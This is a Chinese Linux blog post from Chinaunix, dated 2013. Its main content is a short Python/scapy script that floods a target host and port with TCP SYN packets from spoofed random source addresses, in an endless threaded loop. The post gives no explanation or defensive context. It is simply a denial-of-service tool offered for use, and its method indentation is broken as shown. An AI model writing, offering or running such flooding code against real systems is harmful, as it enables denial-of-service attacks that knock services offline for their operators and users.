Chinaunix首页 | 论坛 | 博客
  • 博客访问: 356681
  • 博文数量: 306
  • 博客积分: 3975
  • 博客等级: 中校
  • 技术积分: 3265
  • 用 户 组: 普通用户
  • 注册时间: 2007-11-27 13:14
文章分类

全部博文(306)

文章存档

2017年(1)

2016年(3)

2015年(11)

2014年(15)

2013年(178)

2012年(41)

2011年(38)

2010年(9)

2009年(9)

2008年(1)

分类: LINUX

2013-09-04 17:54:23

#!/usr/bin/env python
#-*- coding:utf-8 -*-

import socket, random, sys, threading
from scapy.all import *

if len(sys.argv) != 3:
    print "Usage: %s " % sys.argv[0]
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])
total = 0
#conf.iface='eth0';

class sendSYN(threading.Thread):
    global target, port
    def __init__(self):
    threading.Thread.__init__(self)

    def run(self):
    i = IP()
    i.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254))
    i.dst = target

    t = TCP()
    t.sport = random.randint(1,65535)
    t.dport = port
    t.flags = 'S'

    send(i/t, verbose=0)

print "Flooding %s:%i with SYN packets." % (target, port)
while 1:
    sendSYN().start()
    total += 1
    sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total)
阅读(1998) | 评论(0) | 转发(0) |
0

上一篇:dns proxy 程序

下一篇:UDP 流量攻击

给主人留下些什么吧!~~